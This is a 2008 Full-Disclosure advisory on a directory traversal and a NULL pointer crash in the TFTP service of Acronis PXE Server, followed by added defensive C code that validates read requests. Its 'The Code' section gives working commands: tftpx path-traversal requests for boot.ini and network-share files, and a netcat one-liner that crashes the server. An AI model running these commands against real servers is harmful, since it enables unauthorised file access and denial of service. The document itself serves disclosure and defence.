[Full-disclosure] Directory traversal and NULL pointer in Acronis PXE Server 2.0.0.1076




#######################################################################

Luigi Auriemma

Application:  Acronis PXE Server
              http://www.acronis.com/enterprise/products/snapdeploy/
Versions:     <= 2.0.0.1076
Platforms:    Windows
Bugs:         A] directory traversal
              B] NULL pointer
Exploitation: remote
Date:         08 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi@xxxxxxxxxxxxx
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Acronis PXE Server is an essential component of Acronis Snap Deploy
Server, a deployment solution for automatically configuring all the
clients of the local network.


#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

The PXE Server (pxesrv.exe) implements a TFTP server that lets clients
download the bootstrap files (uploading is not allowed).
This service is vulnerable to classic directory traversal and
arbitrary path attacks, which allow an attacker to download any file
from the local disks or the network shares.


---------------
B] NULL pointer
---------------

An incomplete TFTP request (anything from the simple absence of the
option field to a packet containing only the 2 bytes of the opcode)
crashes the PXE Server due to a NULL pointer access.


#######################################################################

===========
3) The Code
===========


A]
http://aluigi.org/testz/tftpx.zip

tftpx SERVER ..\../..\../boot.ini none
tftpx SERVER c:\boot.ini none
tftpx SERVER \\internal_host\documents\file.txt none

B]
send the bytes 00 01 to UDP port 69 of the server:

echo -n -e \x00\x01|nc SERVER 69 -v -v -u



#######################################################################

======
4) Fix
======


No fix


#######################################################################


---
Luigi Auriemma
http://aluigi.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
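
Added example (not code from the advisory or from Acronis): a defensive check a TFTP server could run on every read request before touching the filesystem. It rejects truncated packets such as the 2-byte request in B] and the three filename forms shown in A]. The function and constant names are hypothetical; the packet layout assumed is the RFC 1350 read request.

```c
#include <stddef.h>
#include <string.h>

/* Result codes for check_rrq() (hypothetical names). */
enum { RRQ_OK = 0, RRQ_MALFORMED = -1, RRQ_BAD_PATH = -2 };

/* Length of the NUL-terminated field starting at p, or -1 if there is
 * no terminator before end (field missing or truncated). */
static long field_len(const unsigned char *p, const unsigned char *end)
{
    const unsigned char *nul = (p < end) ? memchr(p, 0, (size_t)(end - p)) : NULL;
    return nul ? (long)(nul - p) : -1;
}

/* Validate a TFTP read request: opcode 00 01, filename, 0, mode, 0.
 * On success *name points at the filename inside pkt. */
int check_rrq(const unsigned char *pkt, size_t len, const char **name)
{
    const unsigned char *end = pkt + len;
    long flen, mlen;
    const char *f, *seg;
    size_t n;

    if (len < 4 || pkt[0] != 0 || pkt[1] != 1)
        return RRQ_MALFORMED;            /* opcode only, or not an RRQ */
    if ((flen = field_len(pkt + 2, end)) <= 0)
        return RRQ_MALFORMED;            /* empty or unterminated filename */
    if ((mlen = field_len(pkt + 2 + flen + 1, end)) <= 0)
        return RRQ_MALFORMED;            /* field after the filename absent */

    f = (const char *)pkt + 2;
    /* Reject absolute paths, UNC paths and drive letters. */
    if (f[0] == '/' || f[0] == '\\' || strchr(f, ':'))
        return RRQ_BAD_PATH;
    /* Reject any ".." segment, whichever separator is used. */
    for (seg = f; ; seg += n + 1) {
        n = strcspn(seg, "/\\");
        if (n == 2 && seg[0] == '.' && seg[1] == '.')
            return RRQ_BAD_PATH;
        if (seg[n] == '\0')
            break;
    }
    *name = f;
    return RRQ_OK;
}
```

The check is lexical only; a server would still resolve the accepted name against its TFTP root and confirm that the canonical path stays inside it.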


